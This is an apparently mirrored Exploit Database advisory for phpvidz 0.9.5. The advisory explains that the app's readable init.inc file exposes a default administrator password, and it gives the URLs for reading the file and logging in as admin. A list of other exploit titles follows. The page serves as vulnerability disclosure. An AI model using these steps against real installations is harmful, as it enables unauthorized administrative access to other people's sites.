phpvidz 0.9.5 – Administrative Credentials Disclosure

Exploit Database
11 阅读

作者： Michael Brooks

日期： 2010-11-24
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/15606/

Researcher: Michael Brooks
Affecting: phpvidz 0.9.5
Vulnerability: Administrative Credentials Disclosure
Vendor's Homepage: http://sourceforge.net/projects/phpvidz/

phpvidz does not use a SQL database. Instead it uses a system of flat
files to maintain application state. The administrative password is
stored within the following file and is included during runtime.
Because this file has a .inc extension it is viewable by the attacker.

To exploit this issue visit this url:
http://localhost/phpvidz_0.9.5/includes/init.inc
By default the password is the following constant:
define ('ADMINPASSWORD' , '0000' );
This password can be used to login here (A username is not required):
http://localhost/phpvidz_0.9.5/admin.php

last Exploits
phpvidz 0.9.5 – Administrative Credentials Disclosure的更多信息

WordPress Plugin GigPress 2.1.10 – Persistent Cross-Site Scripting：
SimplePHPGal 0.7 – Remote File Inclusion：
TP-Link TL-WR740N – Buffer Overflow ‘DOS’：
Quick.CMS 6.7 – SQL Injection Login Bypass：
Dolphin 7.0.x – ‘viewFriends.php’ Multiple Cross-Site Scripting Vulnerabilities：
WespaJuris 3.0 – Multiple Vulnerabilities：
MyBB Extended Useradmininfo Plugin 1.2.1 – Cross-Site Scripting：
phpPgAdmin 7.13.0 – COPY FROM PROGRAM Command Execution (Authenticated)：